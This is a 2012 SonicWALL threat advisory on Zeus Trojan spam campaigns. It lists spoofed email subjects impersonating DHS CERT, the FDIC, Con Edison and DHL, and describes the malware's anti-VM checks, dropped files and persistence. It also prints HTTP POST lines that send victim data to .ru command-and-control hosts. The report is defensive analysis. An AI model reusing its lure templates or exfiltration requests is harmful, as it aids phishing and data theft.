Zeus spam campaigns continue – Year 2012 (Jan 13, 2012)


SonicWALL UTM Research team observed reports of multiple spam campaigns involving new variants of the Zeus Trojan. The most recent campaign involved emails pretending to be from US Department of Homeland Security’s CERT division, warning the user of a Phishing incident and contains a zipped attachment. The zipped attachment in the email is a newer variant of the Zeus Trojan.

Below is a sample of e-mail subjects and targeted organizations seen in these spam campaigns in the past week:

  • Phishing incident report call number: PH000000(Random Number)
    Spoofed: US Government- Computer Emergency Readiness Team
  • FDIC: About your business account (12 digit Alphanumeric)
    Spoofed: US Government- Federal Deposit Insurance Corporation
  • Your Billing Summary as of (DATE)
    Spoofed: Con Edison Inc.
  • DHL Parcel Tracking Notification (Random Number)
    Spoofed: DHL Courier service

SonicWALL Research team has received more than ten unique payloads in the past week from these campaigns. Zeus binaries found in the zipped attachments from these campaigns looks like:


Upon execution, it performs following activities:

  • Checks if it is running in a virtual environment (VBOX, VMware, Virtual PC) and contains anti-debugging code to thwart analysis.
  • Drops the following files on the system and runs it:

    • (Application Data)feahulbofuiv.exe [Detected as GAV: Zbot.YW_163 (Trojan)]
    • (Temp)tmp242dfb15.bat [Deletes the original file and deletes itself]
  • Creates registry entry to ensure that the dropped file runs on system reboot.
  • Connects to a remote C&C server based in China and sends victim machine’s information:
     			POST /stone2012.php HTTP/1.1 			Host: plantlunch.ru 			..... 			bn1=XXXX&sk1=XXXXX 		 			POST /jinjer.php HTTP/1.1 			Host: viperheart.ru 		

SonicWALL Gateway AntiVirus provides proactive protection against these spam campaign via following signature:

  • GAV: Zbot.YMH (Trojan)
  • GAV: Zbot.YW_163 (Trojan)


Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.